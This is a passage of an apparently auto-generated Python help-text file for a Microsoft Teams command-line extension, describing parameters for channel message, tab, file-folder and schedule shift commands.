helps['teams team-primary-channel list-member'] = """
type: command
short-summary: "Get members from teams."
"""
helps['teams team-primary-channel list-message'] = """
type: command
short-summary: "Get messages from teams."
"""
helps['teams team-primary-channel list-tab'] = """
type: command
short-summary: "Get tabs from teams."
"""
helps['teams team-primary-channel show-file-folder'] = """
type: command
short-summary: "Get filesFolder from teams."
"""
helps['teams team-primary-channel show-member'] = """
type: command
short-summary: "Get members from teams."
"""
helps['teams team-primary-channel show-message'] = """
type: command
short-summary: "Get messages from teams."
"""
helps['teams team-primary-channel show-tab'] = """
type: command
short-summary: "Get tabs from teams."
"""
helps['teams team-primary-channel update-file-folder'] = """
type: command
short-summary: "Update the navigation property filesFolder in teams."
parameters:
- name: --sharepoint-ids
short-summary: "sharepointIds"
long-summary: |
Usage: --sharepoint-ids list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX site-url=XX \
tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --microsoft-graph-identity-application
short-summary: "identity"
long-summary: |
Usage: --microsoft-graph-identity-application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --microsoft-graph-identity-device
short-summary: "identity"
long-summary: |
Usage: --microsoft-graph-identity-device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --microsoft-graph-identity-user
short-summary: "identity"
long-summary: |
Usage: --microsoft-graph-identity-user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --audio
short-summary: "audio"
long-summary: |
Usage: --audio album=XX album-artist=XX artist=XX bitrate=XX composers=XX copyright=XX disc=XX \
disc-count=XX duration=XX genre=XX has-drm=XX is-variable-bitrate=XX title=XX track=XX track-count=XX year=XX
album: The title of the album for this audio file.
album-artist: The artist named on the album for the audio file.
artist: The performing artist for the audio file.
bitrate: Bitrate expressed in kbps.
composers: The name of the composer of the audio file.
copyright: Copyright information for the audio file.
disc: The number of the disc this audio file came from.
disc-count: The total number of discs in this album.
duration: Duration of the audio file, expressed in milliseconds
genre: The genre of this audio file.
has-drm: Indicates if the file is protected with digital rights management.
is-variable-bitrate: Indicates if the file is encoded with a variable bitrate.
title: The title of the audio file.
track: The number of the track on the original disc for this audio file.
track-count: The total number of tracks on the original disc for this audio file.
year: The year the audio file was recorded.
- name: --file-system-info
short-summary: "fileSystemInfo"
long-summary: |
Usage: --file-system-info created-date-time=XX last-accessed-date-time=XX last-modified-date-time=XX
created-date-time: The UTC date and time the file was created on a client.
last-accessed-date-time: The UTC date and time the file was last accessed. Available for the recent file \
list only.
last-modified-date-time: The UTC date and time the file was last modified on a client.
- name: --image
short-summary: "image"
long-summary: |
Usage: --image height=XX width=XX
height: Optional. Height of the image, in pixels. Read-only.
width: Optional. Width of the image, in pixels. Read-only.
- name: --location
short-summary: "geoCoordinates"
long-summary: |
Usage: --location altitude=XX latitude=XX longitude=XX
altitude: Optional. The altitude (height), in feet, above sea level for the item. Read-only.
latitude: Optional. The latitude, in decimal, for the item. Read-only.
longitude: Optional. The longitude, in decimal, for the item. Read-only.
- name: --photo
short-summary: "photo"
long-summary: |
Usage: --photo camera-make=XX camera-model=XX exposure-denominator=XX exposure-numerator=XX f-number=XX \
focal-length=XX iso=XX orientation=XX taken-date-time=XX
camera-make: Camera manufacturer. Read-only.
camera-model: Camera model. Read-only.
exposure-denominator: The denominator for the exposure time fraction from the camera. Read-only.
exposure-numerator: The numerator for the exposure time fraction from the camera. Read-only.
f-number: The F-stop value from the camera. Read-only.
focal-length: The focal length from the camera. Read-only.
iso: The ISO value from the camera. Read-only.
orientation: The orientation value from the camera. Writable on OneDrive Personal.
taken-date-time: Represents the date and time the photo was taken. Read-only.
- name: --publication
short-summary: "publicationFacet"
long-summary: |
Usage: --publication level=XX version-id=XX
level: The state of publication for this document. Either published or checkout. Read-only.
version-id: The unique identifier for the version that is visible to the current caller. Read-only.
- name: --microsoft-graph-sharepoint-ids
short-summary: "sharepointIds"
long-summary: |
Usage: --microsoft-graph-sharepoint-ids list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX \
site-url=XX tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --video
short-summary: "video"
long-summary: |
Usage: --video audio-bits-per-sample=XX audio-channels=XX audio-format=XX audio-samples-per-second=XX \
bitrate=XX duration=XX four-cc=XX frame-rate=XX height=XX width=XX
audio-bits-per-sample: Number of audio bits per sample.
audio-channels: Number of audio channels.
audio-format: Name of the audio format (AAC, MP3, etc.).
audio-samples-per-second: Number of audio samples per second.
bitrate: Bit rate of the video in bits per second.
duration: Duration of the file in milliseconds.
four-cc: 'Four character code' name of the video format.
frame-rate: Frame rate of the video.
height: Height of the video, in pixels.
width: Width of the video, in pixels.
- name: --subscriptions
short-summary: "The set of subscriptions on the item. Only supported on the root of a drive."
long-summary: |
Usage: --subscriptions application-id=XX change-type=XX client-state=XX creator-id=XX \
encryption-certificate=XX encryption-certificate-id=XX expiration-date-time=XX include-resource-data=XX \
latest-supported-tls-version=XX lifecycle-notification-url=XX notification-url=XX resource=XX id=XX
application-id: Identifier of the application used to create the subscription. Read-only.
change-type: Required. Indicates the type of change in the subscribed resource that will raise a change \
notification. The supported values are: created, updated, deleted. Multiple values can be combined using a \
comma-separated list.Note: Drive root item and list change notifications support only the updated changeType. User and \
group change notifications support updated and deleted changeType.
client-state: Optional. Specifies the value of the clientState property sent by the service in each change \
notification. The maximum length is 128 characters. The client can check that the change notification came from the \
service by comparing the value of the clientState property sent with the subscription with the value of the \
clientState property received with each change notification.
creator-id: Identifier of the user or service principal that created the subscription. If the app used \
delegated permissions to create the subscription, this field contains the id of the signed-in user the app called on \
behalf of. If the app used application permissions, this field contains the id of the service principal corresponding \
to the app. Read-only.
encryption-certificate: A base64-encoded representation of a certificate with a public key used to encrypt \
resource data in change notifications. Optional. Required when includeResourceData is true.
encryption-certificate-id: A custom app-provided identifier to help identify the certificate needed to \
decrypt resource data. Optional.
expiration-date-time: Required. Specifies the date and time when the webhook subscription expires. The \
time is in UTC, and can be an amount of time from subscription creation that varies for the resource subscribed to. \
See the table below for maximum supported subscription length of time.
include-resource-data: When set to true, change notifications include resource data (such as content of a \
chat message). Optional.
notification-url: Required. The URL of the endpoint that will receive the change notifications. This URL \
must make use of the HTTPS protocol.
resource: Required. Specifies the resource that will be monitored for changes. Do not include the base URL \
(https://graph.microsoft.com/v1.0/). See the possible resource path values for each supported resource.
id: Read-only.
Multiple actions can be specified by using more than one --subscriptions argument.
- name: --versions
short-summary: "The list of previous versions of the item. For more info, see [getting previous versions][]. \
Read-only. Nullable."
long-summary: |
Usage: --versions content=XX size=XX last-modified-by=XX last-modified-date-time=XX publication=XX id=XX
content: The content stream for this version of the item.
size: Indicates the size of the content stream for this version of the item.
last-modified-by: identitySet
last-modified-date-time: Date and time the version was last modified. Read-only.
publication: publicationFacet
id: Read-only.
Multiple actions can be specified by using more than one --versions argument.
- name: --sharepoint-ids1
short-summary: "sharepointIds"
long-summary: |
Usage: --sharepoint-ids1 list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX site-url=XX \
tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --application1
short-summary: "identity"
long-summary: |
Usage: --application1 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device1
short-summary: "identity"
long-summary: |
Usage: --device1 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user1
short-summary: "identity"
long-summary: |
Usage: --user1 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --application2
short-summary: "identity"
long-summary: |
Usage: --application2 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device2
short-summary: "identity"
long-summary: |
Usage: --device2 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user2
short-summary: "identity"
long-summary: |
Usage: --user2 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --content-type
short-summary: "contentTypeInfo"
long-summary: |
Usage: --content-type id=XX name=XX
id: The id of the content type.
name: The name of the content type.
- name: --sharepoint-ids2
short-summary: "sharepointIds"
long-summary: |
Usage: --sharepoint-ids2 list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX site-url=XX \
tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --fields
short-summary: "fieldValueSet"
long-summary: |
Usage: --fields id=XX
id: Read-only.
- name: --microsoft-graph-workbook-application
short-summary: "workbookApplication"
long-summary: |
Usage: --microsoft-graph-workbook-application calculation-mode=XX id=XX
calculation-mode: Returns the calculation mode used in the workbook. Possible values are: Automatic, \
AutomaticExceptTables, Manual.
id: Read-only.
- name: --functions
short-summary: "workbookFunctions"
long-summary: |
Usage: --functions id=XX
id: Read-only.
- name: --microsoft-graph-file-system-info-file-system-info
short-summary: "fileSystemInfo"
long-summary: |
Usage: --microsoft-graph-file-system-info-file-system-info created-date-time=XX last-accessed-date-time=XX \
last-modified-date-time=XX
created-date-time: The UTC date and time the file was created on a client.
last-accessed-date-time: The UTC date and time the file was last accessed. Available for the recent file \
list only.
last-modified-date-time: The UTC date and time the file was last modified on a client.
- name: --microsoft-graph-image
short-summary: "image"
long-summary: |
Usage: --microsoft-graph-image height=XX width=XX
height: Optional. Height of the image, in pixels. Read-only.
width: Optional. Width of the image, in pixels. Read-only.
- name: --package
short-summary: "package"
long-summary: |
Usage: --package type=XX
type: A string indicating the type of package. While oneNote is the only currently defined value, you \
should expect other package types to be returned and handle them accordingly.
- name: --sharepoint-ids3
short-summary: "sharepointIds"
long-summary: |
Usage: --sharepoint-ids3 list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX site-url=XX \
tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --special-folder
short-summary: "specialFolder"
long-summary: |
Usage: --special-folder name=XX
name: The unique identifier for this item in the /drive/special collection
- name: --microsoft-graph-video
short-summary: "video"
long-summary: |
Usage: --microsoft-graph-video audio-bits-per-sample=XX audio-channels=XX audio-format=XX \
audio-samples-per-second=XX bitrate=XX duration=XX four-cc=XX frame-rate=XX height=XX width=XX
audio-bits-per-sample: Number of audio bits per sample.
audio-channels: Number of audio channels.
audio-format: Name of the audio format (AAC, MP3, etc.).
audio-samples-per-second: Number of audio samples per second.
bitrate: Bit rate of the video in bits per second.
duration: Duration of the file in milliseconds.
four-cc: 'Four character code' name of the video format.
frame-rate: Frame rate of the video.
height: Height of the video, in pixels.
width: Width of the video, in pixels.
- name: --view
short-summary: "folderView"
long-summary: |
Usage: --view sort-by=XX sort-order=XX view-type=XX
sort-by: The method by which the folder should be sorted.
sort-order: If true, indicates that items should be sorted in descending order. Otherwise, items should be \
sorted ascending.
view-type: The type of view that should be used to represent the folder.
- name: --hashes
short-summary: "hashes"
long-summary: |
Usage: --hashes crc32-hash=XX quick-xor-hash=XX sha1-hash=XX sha256-hash=XX
crc32-hash: The CRC32 value of the file in little endian (if available). Read-only.
quick-xor-hash: A proprietary hash of the file that can be used to determine if the contents of the file \
have changed (if available). Read-only.
sha1-hash: SHA1 hash for the contents of the file (if available). Read-only.
sha256-hash: SHA256 hash for the contents of the file (if available). Read-only.
"""
helps['teams team-primary-channel update-member'] = """
type: command
short-summary: "Update the navigation property members in teams."
"""
helps['teams team-primary-channel update-message'] = """
type: command
short-summary: "Update the navigation property messages in teams."
parameters:
- name: --attachments
short-summary: "Attached files. Attachments are currently read-only – sending attachments is not supported."
long-summary: |
Usage: --attachments content=XX content-type=XX content-url=XX id=XX name=XX thumbnail-url=XX
content: The content of the attachment. If the attachment is a rich card, set the property to the rich \
card object. This property and contentUrl are mutually exclusive.
content-type: The media type of the content attachment. It can have the following values: reference: \
Attachment is a link to another file. Populate the contentURL with the link to the object.file: Raw file attachment. \
Populate the contenturl field with the base64 encoding of the file in data: format.image/: Image type with the type of \
the image specified ex: image/png, image/jpeg, image/gif. Populate the contentUrl field with the base64 encoding of \
the file in data: format.video/: Video type with the format specified. Ex: video/mp4. Populate the contentUrl field \
with the base64 encoding of the file in data: format.audio/: Audio type with the format specified. Ex: audio/wmw. \
Populate the contentUrl field with the base64 encoding of the file in data: format.application/card type: Rich card \
attachment type with the card type specifying the exact card format to use. Set content with the json format of the \
card. Supported values for card type include:application/vnd.microsoft.card.adaptive: A rich card that can contain any \
combination of text, speech, images,,buttons, and input fields. Set the content property to,an AdaptiveCard \
object.application/vnd.microsoft.card.animation: A rich card that plays animation. Set the content property,to an \
AnimationCardobject.application/vnd.microsoft.card.audio: A rich card that plays audio files. Set the content \
property,to an AudioCard object.application/vnd.microsoft.card.video: A rich card that plays videos. Set the content \
property,to a VideoCard object.application/vnd.microsoft.card.hero: A Hero card. Set the content property to a \
HeroCard object.application/vnd.microsoft.card.thumbnail: A Thumbnail card. Set the content property to a \
ThumbnailCard object.application/vnd.microsoft.com.card.receipt: A Receipt card. Set the content property to a \
ReceiptCard object.application/vnd.microsoft.com.card.signin: A user Sign In card. Set the content property to a \
SignInCard object.
content-url: URL for the content of the attachment. Supported protocols: http, https, file and data.
id: Read-only. Unique id of the attachment.
name: Name of the attachment.
thumbnail-url: URL to a thumbnail image that the channel can use if it supports using an alternative, \
smaller form of content or contentUrl. For example, if you set contentType to application/word and set contentUrl to \
the location of the Word document, you might include a thumbnail image that represents the document. The channel could \
display the thumbnail image instead of the document. When the user clicks the image, the channel would open the \
document.
Multiple actions can be specified by using more than one --attachments argument.
- name: --body
short-summary: "itemBody"
long-summary: |
Usage: --body content=XX content-type=XX
content: The content of the item.
- name: --hosted-contents
long-summary: |
Usage: --hosted-contents id=XX
id: Read-only.
Multiple actions can be specified by using more than one --hosted-contents argument.
- name: --policy-tip
short-summary: "chatMessagePolicyViolationPolicyTip"
long-summary: |
Usage: --policy-tip compliance-url=XX general-text=XX matched-condition-descriptions=XX
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-primary-channel update-tab'] = """
type: command
short-summary: "Update the navigation property tabs in teams."
parameters:
- name: --configuration
short-summary: "teamsTabConfiguration"
long-summary: |
Usage: --configuration content-url=XX entity-id=XX remove-url=XX website-url=XX
content-url: Url used for rendering tab contents in Teams. Required.
entity-id: Identifier for the entity hosted by the tab provider.
remove-url: Url called by Teams client when a Tab is removed using the Teams Client.
website-url: Url for showing tab contents outside of Teams.
- name: --app-definitions
short-summary: "The details for each version of the app."
long-summary: |
Usage: --app-definitions display-name=XX teams-app-id=XX version=XX id=XX
display-name: The name of the app provided by the app developer.
teams-app-id: The ID from the Teams app manifest.
version: The version number of the application.
id: Read-only.
Multiple actions can be specified by using more than one --app-definitions argument.
"""
helps['teams team-primary-channel-message'] = """
type: group
short-summary: Manage team primary channel message with teams_v1_0
"""
helps['teams team-primary-channel-message create-hosted-content'] = """
type: command
short-summary: "Create new navigation property to hostedContents for teams."
"""
helps['teams team-primary-channel-message create-reply'] = """
type: command
short-summary: "Create new navigation property to replies for teams."
parameters:
- name: --attachments
short-summary: "Attached files. Attachments are currently read-only – sending attachments is not supported."
long-summary: |
Usage: --attachments content=XX content-type=XX content-url=XX id=XX name=XX thumbnail-url=XX
content: The content of the attachment. If the attachment is a rich card, set the property to the rich \
card object. This property and contentUrl are mutually exclusive.
content-type: The media type of the content attachment. It can have the following values: reference: \
Attachment is a link to another file. Populate the contentURL with the link to the object.file: Raw file attachment. \
Populate the contenturl field with the base64 encoding of the file in data: format.image/: Image type with the type of \
the image specified ex: image/png, image/jpeg, image/gif. Populate the contentUrl field with the base64 encoding of \
the file in data: format.video/: Video type with the format specified. Ex: video/mp4. Populate the contentUrl field \
with the base64 encoding of the file in data: format.audio/: Audio type with the format specified. Ex: audio/wmw. \
Populate the contentUrl field with the base64 encoding of the file in data: format.application/card type: Rich card \
attachment type with the card type specifying the exact card format to use. Set content with the json format of the \
card. Supported values for card type include:application/vnd.microsoft.card.adaptive: A rich card that can contain any \
combination of text, speech, images,,buttons, and input fields. Set the content property to,an AdaptiveCard \
object.application/vnd.microsoft.card.animation: A rich card that plays animation. Set the content property,to an \
AnimationCardobject.application/vnd.microsoft.card.audio: A rich card that plays audio files. Set the content \
property,to an AudioCard object.application/vnd.microsoft.card.video: A rich card that plays videos. Set the content \
property,to a VideoCard object.application/vnd.microsoft.card.hero: A Hero card. Set the content property to a \
HeroCard object.application/vnd.microsoft.card.thumbnail: A Thumbnail card. Set the content property to a \
ThumbnailCard object.application/vnd.microsoft.com.card.receipt: A Receipt card. Set the content property to a \
ReceiptCard object.application/vnd.microsoft.com.card.signin: A user Sign In card. Set the content property to a \
SignInCard object.
content-url: URL for the content of the attachment. Supported protocols: http, https, file and data.
id: Read-only. Unique id of the attachment.
name: Name of the attachment.
thumbnail-url: URL to a thumbnail image that the channel can use if it supports using an alternative, \
smaller form of content or contentUrl. For example, if you set contentType to application/word and set contentUrl to \
the location of the Word document, you might include a thumbnail image that represents the document. The channel could \
display the thumbnail image instead of the document. When the user clicks the image, the channel would open the \
document.
Multiple actions can be specified by using more than one --attachments argument.
- name: --body
short-summary: "itemBody"
long-summary: |
Usage: --body content=XX content-type=XX
content: The content of the item.
- name: --hosted-contents
long-summary: |
Usage: --hosted-contents id=XX
id: Read-only.
Multiple actions can be specified by using more than one --hosted-contents argument.
- name: --policy-tip
short-summary: "chatMessagePolicyViolationPolicyTip"
long-summary: |
Usage: --policy-tip compliance-url=XX general-text=XX matched-condition-descriptions=XX
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-primary-channel-message delete-hosted-content'] = """
type: command
short-summary: "Delete navigation property hostedContents for teams."
"""
helps['teams team-primary-channel-message delete-reply'] = """
type: command
short-summary: "Delete navigation property replies for teams."
"""
helps['teams team-primary-channel-message list-hosted-content'] = """
type: command
short-summary: "Get hostedContents from teams."
"""
helps['teams team-primary-channel-message list-reply'] = """
type: command
short-summary: "Get replies from teams."
"""
helps['teams team-primary-channel-message show-hosted-content'] = """
type: command
short-summary: "Get hostedContents from teams."
"""
helps['teams team-primary-channel-message show-reply'] = """
type: command
short-summary: "Get replies from teams."
"""
helps['teams team-primary-channel-message update-hosted-content'] = """
type: command
short-summary: "Update the navigation property hostedContents in teams."
"""
helps['teams team-primary-channel-message update-reply'] = """
type: command
short-summary: "Update the navigation property replies in teams."
parameters:
- name: --attachments
short-summary: "Attached files. Attachments are currently read-only – sending attachments is not supported."
long-summary: |
Usage: --attachments content=XX content-type=XX content-url=XX id=XX name=XX thumbnail-url=XX
content: The content of the attachment. If the attachment is a rich card, set the property to the rich \
card object. This property and contentUrl are mutually exclusive.
content-type: The media type of the content attachment. It can have the following values: reference: \
Attachment is a link to another file. Populate the contentURL with the link to the object.file: Raw file attachment. \
Populate the contenturl field with the base64 encoding of the file in data: format.image/: Image type with the type of \
the image specified ex: image/png, image/jpeg, image/gif. Populate the contentUrl field with the base64 encoding of \
the file in data: format.video/: Video type with the format specified. Ex: video/mp4. Populate the contentUrl field \
with the base64 encoding of the file in data: format.audio/: Audio type with the format specified. Ex: audio/wmw. \
Populate the contentUrl field with the base64 encoding of the file in data: format.application/card type: Rich card \
attachment type with the card type specifying the exact card format to use. Set content with the json format of the \
card. Supported values for card type include:application/vnd.microsoft.card.adaptive: A rich card that can contain any \
combination of text, speech, images,,buttons, and input fields. Set the content property to,an AdaptiveCard \
object.application/vnd.microsoft.card.animation: A rich card that plays animation. Set the content property,to an \
AnimationCardobject.application/vnd.microsoft.card.audio: A rich card that plays audio files. Set the content \
property,to an AudioCard object.application/vnd.microsoft.card.video: A rich card that plays videos. Set the content \
property,to a VideoCard object.application/vnd.microsoft.card.hero: A Hero card. Set the content property to a \
HeroCard object.application/vnd.microsoft.card.thumbnail: A Thumbnail card. Set the content property to a \
ThumbnailCard object.application/vnd.microsoft.com.card.receipt: A Receipt card. Set the content property to a \
ReceiptCard object.application/vnd.microsoft.com.card.signin: A user Sign In card. Set the content property to a \
SignInCard object.
content-url: URL for the content of the attachment. Supported protocols: http, https, file and data.
id: Read-only. Unique id of the attachment.
name: Name of the attachment.
thumbnail-url: URL to a thumbnail image that the channel can use if it supports using an alternative, \
smaller form of content or contentUrl. For example, if you set contentType to application/word and set contentUrl to \
the location of the Word document, you might include a thumbnail image that represents the document. The channel could \
display the thumbnail image instead of the document. When the user clicks the image, the channel would open the \
document.
Multiple actions can be specified by using more than one --attachments argument.
- name: --body
short-summary: "itemBody"
long-summary: |
Usage: --body content=XX content-type=XX
content: The content of the item.
- name: --hosted-contents
long-summary: |
Usage: --hosted-contents id=XX
id: Read-only.
Multiple actions can be specified by using more than one --hosted-contents argument.
- name: --policy-tip
short-summary: "chatMessagePolicyViolationPolicyTip"
long-summary: |
Usage: --policy-tip compliance-url=XX general-text=XX matched-condition-descriptions=XX
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-primary-channel-tab'] = """
type: group
short-summary: Manage team primary channel tab with teams_v1_0
"""
helps['teams team-primary-channel-tab delete-ref-team-app'] = """
type: command
short-summary: "Delete ref of navigation property teamsApp for teams."
"""
helps['teams team-primary-channel-tab set-ref-team-app'] = """
type: command
short-summary: "Update the ref of navigation property teamsApp in teams."
"""
helps['teams team-primary-channel-tab show-ref-team-app'] = """
type: command
short-summary: "Get ref of teamsApp from teams."
"""
helps['teams team-primary-channel-tab show-team-app'] = """
type: command
short-summary: "Get teamsApp from teams."
"""
helps['teams team-schedule'] = """
type: group
short-summary: Manage team schedule with teams_v1_0
"""
helps['teams team-schedule create-offer-shift-request'] = """
type: command
short-summary: "Create new navigation property to offerShiftRequests for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule create-open-shift'] = """
type: command
short-summary: "Create new navigation property to openShifts for teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --draft-open-shift
short-summary: "openShiftItem"
long-summary: |
Usage: --draft-open-shift open-slot-count=XX activities=XX display-name=XX notes=XX end-date-time=XX \
start-date-time=XX theme=XX
open-slot-count: Count of the number of slots for the given open shift.
activities: An incremental part of a shift which can cover details of when and where an employee is during \
their shift. For example, an assignment or a scheduled break or lunch. Required.
display-name: The shift label of the shiftItem.
notes: The shift notes for the shiftItem.
- name: --shared-open-shift
short-summary: "openShiftItem"
long-summary: |
Usage: --shared-open-shift open-slot-count=XX activities=XX display-name=XX notes=XX end-date-time=XX \
start-date-time=XX theme=XX
open-slot-count: Count of the number of slots for the given open shift.
activities: An incremental part of a shift which can cover details of when and where an employee is during \
their shift. For example, an assignment or a scheduled break or lunch. Required.
